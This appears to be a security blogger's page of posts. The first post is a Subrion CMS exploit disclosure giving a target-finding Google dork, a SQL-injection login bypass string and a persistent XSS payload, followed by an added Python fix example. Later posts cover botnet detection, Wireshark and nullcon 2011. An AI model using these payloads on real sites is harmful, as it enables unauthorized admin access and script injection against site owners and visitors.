Subrion CMS multiple vulnerabilities ~3xpl0it~

Hi folks,

Releasing my first exploit today, about multiple vulnerabilities in Subrion CMS. You can also check exploit-db, inj3ct0r and packetstormsecurity for the exploit. Here, I am posting my first exploit for you to go through.

Disclaimer: The author isn’t responsible for any misuse of this exploit. This is posted here for a conceptual understanding of multiple vulnerabilities that can occur within a single site. Hack to learn, but don't learn to hack.

Peace \m/

Here’s the 3xpl0it:

SUBRION CMS multiple vulnerabilities

vendor: www.subrion.com
Author: Karthik R (3psil0nLambDa)
Email:  Karthik.cupid@gmail.com
My blog: epsilonlambda.co.cc
Google dork:  © 2011 Powered by Subrion CMS 

Description about the CMS

Subrion CMS unites the functionality of articles script, auto 
classifieds script,realty classifieds script, and web directory
script all in one package. Subrion's highly scalable set of key
features makes it a powerful platform for web sites. Subrion CMS
is easy to install and simple to manage. Use it as a stand-alone
application or in conjunction with other applications to create 
entry level sites, mid-sized or large sites. You can be confident
that you will be able to invest in this system and continue to
grow it to any possible level.

Exploits:

SQLi Vulnerability

The attackers can use the authentication bypass to get into the
admin panel in the site.

Exploit: Username: ' or 0=0 #
	 Password: ' or 0=0 #

Persistent XSS vulnerability

The Poll module and Manage pages are vulnerable to persistent XSS
in the title field.

Exploit: 
%22%3E%3CIFRAME SRC="javascript:alert('XSS');%22%3E%3C/IFRAME%3E
----------------------------------------------------------
Greets and tribute to: side^effects and my love taashu
----------------------------------------------------------
This can be further extended depending on your arsenal.
Until next time, 3ps!l0nLaMbDa signing off. \m/
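
The two fixes for the issues in the advisory above, as an added example that is not part of the original post or of Subrion's code: bind login input as query parameters, and HTML-encode the stored title on output. It is written in Python with an in-memory sqlite3 table standing in for the CMS database; the table, column and function names are hypothetical, and the concatenated query only shows the pattern assumed to be behind the bypass (in MySQL, `#` starts a comment).

```python
import hashlib
import hmac
import html
import os
import sqlite3
from urllib.parse import unquote

# Strings quoted in the advisory above.
LOGIN_PAYLOAD = "' or 0=0 #"
TITLE_PAYLOAD = unquote(
    "%22%3E%3CIFRAME SRC=\"javascript:alert('XSS');%22%3E%3C/IFRAME%3E")

def concatenated_query(username, password):
    """Vulnerable pattern (assumed): input pasted into SQL text. Built, never run."""
    return ("SELECT id FROM admins WHERE username = '" + username
            + "' AND password = '" + password + "'")

def _hash(password, salt):
    # Salted PBKDF2 so the table never holds a comparable plaintext password.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)

def make_db():
    """Constructed in-memory table; the schema is hypothetical, not Subrion's."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (id INTEGER PRIMARY KEY, "
               "username TEXT UNIQUE, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    db.execute("INSERT INTO admins (username, salt, pw_hash) VALUES (?, ?, ?)",
               ("admin", salt, _hash("constructed-passphrase", salt)))
    return db

def login(db, username, password):
    """Hardened login: username bound as data, password checked against its hash."""
    row = db.execute("SELECT salt, pw_hash FROM admins WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        return False
    return hmac.compare_digest(_hash(password, row[0]), row[1])

def render_title(title):
    """Encode a stored title for HTML output so markup in it is shown as text."""
    return "<h2>{}</h2>".format(html.escape(title, quote=True))

if __name__ == "__main__":
    print(concatenated_query(LOGIN_PAYLOAD, LOGIN_PAYLOAD))  # quote closes early
    print(login(make_db(), LOGIN_PAYLOAD, LOGIN_PAYLOAD))    # bound as data
    print(render_title(TITLE_PAYLOAD))                       # inert text
```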
 

Four Handy botnet detection tools and techniques : A tutorial

Recently, my 3rd article got published in a security portal – searchsecurity.techtarget.in.

An overview:

It’s essential to know the difference between a bot and a botnet before you can identify suitable botnet detection techniques and tools. While an autonomous program automatically performing tasks in the absence of a real user is known as a bot, a network of autonomous programs capable of acting on instructions is known as a botnet. A few examples of botnets include: Storm, Kraken, Conficker and Zeus, among others.

As botnets continue to gain momentum in the form of spam bots, click fraud, large-scale identity thefts, proxy nets and large-scale distributed denial of service (DDoS) attacks, it’s proving to be a challenge to defend against these intrusive autonomous programs. Generally, a botnet may display the following behavior patterns: signature-based, anomaly-based, DNS-based and mining-based. This tip discusses how to effectively use various botnet detection techniques and tools.

For the full article, kindly click on the link below:

http://searchsecurity.techtarget.in/tip/Four-handy-botnet-detection-techniques-and-tools-A-tutorial

Thank You

3ps!l0nlAmBdA

Quick and Dirty wireshark tutorial-2

Hi again,

Just got an email from Anil of techtarget.com, informing me about my article being published in their online magazine. Interested people can please look into it. The link to the article is here: http://searchsecurity.techtarget.in/tutorial/Quick-and-dirty-Wireshark-tutorial

Thanks to Tamaghna, for informing about this opportunity and also the null community. I am thankful to Mr. Anil Patrick of techtarget, for publishing my article.

Keep reading this blog, for more…

Cheers

3ps!l0nLaMbDa

Nullcon dwitiya 2011

Hey folks,

I had a great time attending nullcon 2011, 2 days of sheer fun, knowledge and networking. Met a lot of people, got to know them personally, especially those whom I had met only through IRC. A nice ambience at “The Retreat” Zuri, beach resort, which comes in Utor Doxi, Pedda, Varca, Salcette.

The food was great, the t-shirt even better and finally the CPE which we got, at the end of the 2nd day, all added to those small gains I had which can turn into big ones. Will be indebted to basu bhai, who helped us a lot, and in all it was a gr8 experience. Here’s an article I am presenting to you which will give you a glimpse of nullcon. A lot more to be covered, but, currently, only so much.

Nullcon (http://nullcon.net) Dwitiya witnessed action worth following—whether it is the Desi Jugaad track on Hacking the Parliament or demystifying the Zeus man in the middle attack on cell phones. Get into the thick of all the action at nullcon Day Zero with our vignette series.

In its second year, nullcon 2011 is now an international security conference that witnesses the participation of India’s top whitehat hackers. Organized by the null information security community, nullcon 2011 is being held at The RETREAT by Zuri, Goa. With twin parallel tracks that cover various aspects such as technical tracks, security trend debates, research papers and CXO sessions, this is an event that sees participation from hackers—desi as well as international.

With tracks like Desi Jugaad which includes India-specific hacks, the event promises insights worth exploring for the security enthusiast as well, rather than just pure-play infosec. As part of our detailed nullcon Dwitiya coverage, we have put together some of the hottest topics of Day Zero. These presentations examine some of the hottest challenges—right from exploiting SCADA systems and building intelligence analysis systems to reversing Microsoft patches for analysis of vulnerable code. Here are some of the highlights of nullcon 2011’s Day Zero.

Session: Exploiting SCADA systems

Presenter: Jeremy Brown

During this session of nullcon 2011, Jeremy Brown of Tenable Network Security lays bare the vulnerabilities that surround SCADA software as well as the vendor apathy which makes these systems so vulnerable. Brown also conducts the demo of a live SCADA system exploit as part of this session. With threats like Stuxnet highlighting the need for secure SCADA systems, this is one presentation that you cannot afford to miss.

Paper: Reversing Microsoft patches to reveal vulnerable code

Presenter: Harsimran Walia

Application Developer Harsimran Walia’s paper details identification of vulnerable code files in Microsoft solutions through reverse engineering of patches and files for these products. The paper puts forward the need to leverage this process for creation of vulnerability signatures, an approach which is superior to the use of exploit signatures for making undisclosed exploit and patch verification.

Workshop: Building an intelligence analysis systems using open source tools

Presenter: Fyodor Yarochkin

As part of this nullcon 2011 workshop, security analyst Fyodor Yarochkin from Armorize Technologies exhibits how open source tools can be used to mine Internet data, organize and tag it for extraction of meaningful information. This hands-on workshop examines how intelligence analysis systems can be built using various open source solutions such as Nutch, solr, lucene, Soghun (machine learning framework), hadoop and netglub.

(Article courtesy: http://searchsecurity.techtarget.in)

Cheers

3ps!l0nLaMbDa